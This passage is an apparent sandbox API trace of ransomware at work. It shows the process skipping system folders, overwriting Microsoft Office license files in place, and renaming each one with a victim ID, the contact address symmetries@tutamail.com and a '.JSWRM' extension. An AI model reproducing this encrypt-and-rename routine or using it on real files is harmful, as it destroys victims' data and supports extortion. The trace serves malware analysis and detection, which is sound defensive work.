(lpString1="O365HomePremR_SubTrial5-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0105.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0105.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial5-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0105.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial5-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial5-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0105.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0105.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0105.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial5-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0105.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial5-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial5-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0105.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0105.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0105.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0105.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0105.257] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial5-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial5-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.258] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11635) returned 1 [0105.258] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0105.258] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0105.261] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.261] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0105.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.262] CloseHandle (hObject=0x45c) returned 1 [0105.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0105.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0105.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0105.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0105.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0105.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0105.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0105.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.262] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial5-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial5-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial5-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial5-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0105.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0105.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0105.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.263] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe63079a2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe63079a2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe63c64e0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bcf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusDemoR_BypassTrial180-pl.xrm-ms", cAlternateFileName="O338DF~1.XRM")) returned 1 [0105.263] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-pl.xrm-ms", lpString2=".") returned 1 [0105.263] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-pl.xrm-ms", lpString2="..") returned 1 [0105.263] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-pl.xrm-ms", lpString2="...") returned 1 [0105.263] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-pl.xrm-ms", lpString2="windows") returned -1 [0105.263] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-pl.xrm-ms", lpString2="recovery") returned -1 [0105.263] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-pl.xrm-ms", lpString2="perflogs") returned -1 [0105.263] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-pl.xrm-ms", lpString2="documents and settings") returned 1 [0105.263] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.263] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-pl.xrm-ms", lpString2="system volume information") returned -1 [0105.263] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-pl.xrm-ms", lpString2="msocache") returned 1 [0105.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0105.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0105.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusDemoR_BypassTrial180-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0105.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0105.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0105.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0105.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0105.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d298, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusDemoR_BypassTrial180-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0105.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0105.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0105.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0105.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0105.264] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusDemoR_BypassTrial180-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusdemor_bypasstrial180-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.264] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11215) returned 1 [0105.264] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bc0) returned 0x24c1d0 [0105.264] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bc0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bc0, lpOverlapped=0x0) returned 1 [0105.270] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.270] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bc0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bc0, lpOverlapped=0x0) returned 1 [0105.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.271] CloseHandle (hObject=0x45c) returned 1 [0105.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0105.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0105.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0105.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f1b0 [0105.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0105.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f1b0 | out: hHeap=0x1e0000) returned 1 [0105.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.271] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusDemoR_BypassTrial180-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusdemor_bypasstrial180-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusDemoR_BypassTrial180-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusdemor_bypasstrial180-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0105.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0105.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0105.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.275] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe62bb50d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe62bb50d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe637a07d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5f42, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusDemoR_BypassTrial180-ppd.xrm-ms", cAlternateFileName="O3737D~1.XRM")) returned 1 [0105.275] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-ppd.xrm-ms", lpString2=".") returned 1 [0105.275] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-ppd.xrm-ms", lpString2="..") returned 1 [0105.275] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-ppd.xrm-ms", lpString2="...") returned 1 [0105.275] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-ppd.xrm-ms", lpString2="windows") returned -1 [0105.275] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-ppd.xrm-ms", lpString2="recovery") returned -1 [0105.275] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-ppd.xrm-ms", lpString2="perflogs") returned -1 [0105.275] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0105.275] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.275] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-ppd.xrm-ms", lpString2="system volume information") returned -1 [0105.275] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-ppd.xrm-ms", lpString2="msocache") returned 1 [0105.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0105.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0105.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22d0d8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusDemoR_BypassTrial180-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0105.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0105.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0105.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0105.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22d0a0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusDemoR_BypassTrial180-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0105.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0105.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0105.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0105.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0105.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusDemoR_BypassTrial180-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusdemor_bypasstrial180-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.276] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=24386) returned 1 [0105.276] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5f40) returned 0x24c1d0 [0105.276] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5f40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5f40, lpOverlapped=0x0) returned 1 [0105.370] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.370] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5f40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5f40, lpOverlapped=0x0) returned 1 [0105.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.371] CloseHandle (hObject=0x45c) returned 1 [0105.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0105.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0105.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0105.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0105.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0105.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0105.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0105.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.371] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusDemoR_BypassTrial180-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusdemor_bypasstrial180-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusDemoR_BypassTrial180-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusdemor_bypasstrial180-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0105.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0105.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0105.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.373] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: 